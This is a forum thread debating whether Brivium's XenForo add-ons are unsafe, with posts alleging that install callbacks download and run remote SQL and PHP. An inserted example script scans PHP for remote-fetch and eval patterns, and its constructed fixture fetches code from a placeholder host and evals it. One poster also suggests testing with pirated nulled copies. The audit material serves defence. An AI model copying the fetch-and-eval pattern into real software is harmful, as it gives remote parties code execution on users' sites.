Do you consider Brivium addons a security risk?

tyteen4a03

Aspirant
Joined
May 26, 2012
Messages
24
I have never used a Brivium addon but I am wondering; has any coder audited their addon codes? I am sure it is possible to remove the callbacks without modifying the functionality of the addon.
 

LloydM

Adherent
Joined
Dec 5, 2011
Messages
431
Do you feel secure with it? Will you keep using them? What do you think the risks are?
All information is not secure, I would never use their addons again, cause everything would be put at risk.
 

ner8

Aspirant
Joined
Jun 27, 2015
Messages
21
From my humble experience in web app security auditing and old teen times hacking websites and replacing index.html then registering them at zone-h.
That was fun. Well this thread is straying to more of a "blind panic" approach than a reasonable one where someone actually audits at least one small plugin to check for callbacks and if they're there just for license check and confirm with documentation. This hasn't been done. Which makes me think all the members who replied in this thread aren't experienced on the technical side.

I agree, Brivium looks shady after the recent event on TAZ, although I wouldn't agree all their plugins are infected just over the fact a member from TAZ who has permissions to edit threads got hacked for the benefit of Brivium to remove their negative reputation.

We want more experienced coders to actually audit some very useful plugin that Brivium made. And there are nulled versions of them, in case you don't want to buy just for testing.

Other than that, I think using some of Brivium plugins to achieve simple functionality won't be that disaster you imagine in your mind with no proof on the technical aspects to support your wild imagination.

On the negative side, and regardless of whether Brivium plugins are all infected, it's actually not healthy to install a lot of plugins, most sites get hacked due to vulnerable plugins, a hacker will always search what plugins you installed and start the penetration testing phase, and Brivium's approach encourages this unhealthy practice with a lot of addons that only achieve simple functionality, sometimes it's just an "<a href>" added in a template, they call it plugin and sell for $10.
 

TJA

Resident Sheep Fondler
Joined
Jul 21, 2014
Messages
890
A thing, or maybe a thong, let's all sing a song, nah that's just wrong. Ping Pong?
 

Xon

Developer
Joined
Feb 15, 2015
Messages
311
We want more experienced coders to actually audit some very useful plugin that brivium made.
Experienced coders have looked at Brivium's addons. Brivium is the entire reason XenForo.com has the policy about disclosure of callbacks during install/uninstall and has explicit provisions that uninstalling should not require an external server.

Brivium's addons allowed undisclosed arbitrary SQL and PHP to be downloaded and executed on install & uninstall. That is utterly unacceptable. Especially given the still current links with addon warez sites.
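
As an added example (not part of the thread and not any add-on's real code): a first-pass static triage for the pattern described above, where an add-on fetches content from a remote server and executes it. The sample files, class names and URL are constructed; a regex pass only points a reviewer at lines to read, and it covers PHP execution, not downloaded SQL.

```python
import re

# Constructed sample (hypothetical add-on, not real code): one file fetches and runs remote code.
SAMPLE_ADDON = {
    "Install.php": '''<?php
class Example_Install {
    public static function install() {
        $code = file_get_contents("https://updates.example.invalid/install.txt");
        eval($code);
    }
}
''',
    "Listener.php": '''<?php
class Example_Listener {
    public static function templateHook($name, &$contents) {
        $contents .= '<a href="/help">Help</a>';
    }
}
''',
}

# PHP primitives that can reach the network, and sinks that run data as code.
FETCH = re.compile(r"\b(curl_exec|fsockopen|file_get_contents|fopen|stream_socket_client)\s*\(")
REMOTE_HINT = re.compile(r"https?://|curl_exec|fsockopen|stream_socket_client")
EXEC = re.compile(r"\b(eval|create_function)\s*\(|\b(include|require)(_once)?\s*\(?\s*\$")

def audit_file(source):
    """Return (line_no, kind, text) findings for one PHP source string."""
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        if FETCH.search(line) and REMOTE_HINT.search(line):
            findings.append((no, "remote-fetch", line.strip()))
        if EXEC.search(line):
            findings.append((no, "dynamic-exec", line.strip()))
    return findings

def audit_addon(files):
    """Map filename -> (risk, findings); 'high' when fetch and exec share a file."""
    report = {}
    for name, source in files.items():
        found = audit_file(source)
        kinds = {kind for _, kind, _ in found}
        risk = "high" if kinds == {"remote-fetch", "dynamic-exec"} else "review" if kinds else "none"
        report[name] = (risk, found)
    return report

if __name__ == "__main__":
    for name, (risk, found) in audit_addon(SAMPLE_ADDON).items():
        print(name, risk, [(no, kind) for no, kind, _ in found])
```
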
 

Jim McClain

Senior Citizen
Joined
Jan 31, 2006
Messages
2,005
And on that note.. before I head off to bed, I'll leave this especially for you TJA.

Oh HEY... Whoa, man, I'm on oxygen here dude! Give a guy a little warning. You almost gave me another heart attack.

Okay now, lemme catch my breath... get a quick hit on the Albuterol... crank up the o2 liters... check my spirometry... whew...
where's that replay button again?
 

PoetJC

⚧ Jacquii: Kween of Hearts ⚧
Joined
Jul 9, 2006
Messages
20,983
Oh HEY... Whoa, man, I'm on oxygen here dude! Give a guy a little warning. You almost gave me another heart attack.

Okay now, lemme catch my breath... get a quick hit on the Albuterol... crank up the o2 liters... check my spirometry... whew...
where's that replay button again?
Hilarious post!
I can imagine you getting your jam on to that thong tha-thong-thong-thong!!!
I bet you cut a rug to entire pieces LOL

J.
 

vij

Enthusiast
Joined
Jun 9, 2012
Messages
123
Even before the ban, when some people complained about Brivium on the official XenForo forums they got IP bans on Brivium's site. Their code has unnecessary callbacks and they DO inject code. They own a warez forum. They are suspected of hacking a mod's account here. Their code structure is misleading and untidy. Everything about them reeks of behavior that is reminiscent of people who distribute warez. Oh yes, they can't be trusted.
 

ozzy47

Tazmanian Master
Joined
Oct 18, 2013
Messages
8,960
If I was ever to start a site using XenForo, I for sure would not use any of their mods. They are a shady, untrustable bunch.
 

Nirjonadda

Aspirant
Joined
Feb 4, 2017
Messages
17
Please can you let me know whether the Brivium add-on developer is "borbole", the former vB coder/designer? I am still using some paid add-ons from Brivium. Please let me know if I am now under any security risk.
 

ozzy47

Tazmanian Master
Joined
Oct 18, 2013
Messages
8,960
I would not use any of their addons, any one or all of them could have serious security issues.
 

Nirjonadda

Aspirant
Joined
Feb 4, 2017
Messages
17
I would not use any of their addons, any one or all of them could have serious security issues.


Do you know if the Brivium add-on developer is "borbole"? What type of security issues? Are fixes for any kind of security issues not coming from the Brivium add-on developer?
 

ozzy47

Tazmanian Master
Joined
Oct 18, 2013
Messages
8,960
He is/was/maybe one of the group, their addons have been found to have many security issues, that is one of the reasons they are banned from the XF forum. I would not trust them ever!!
 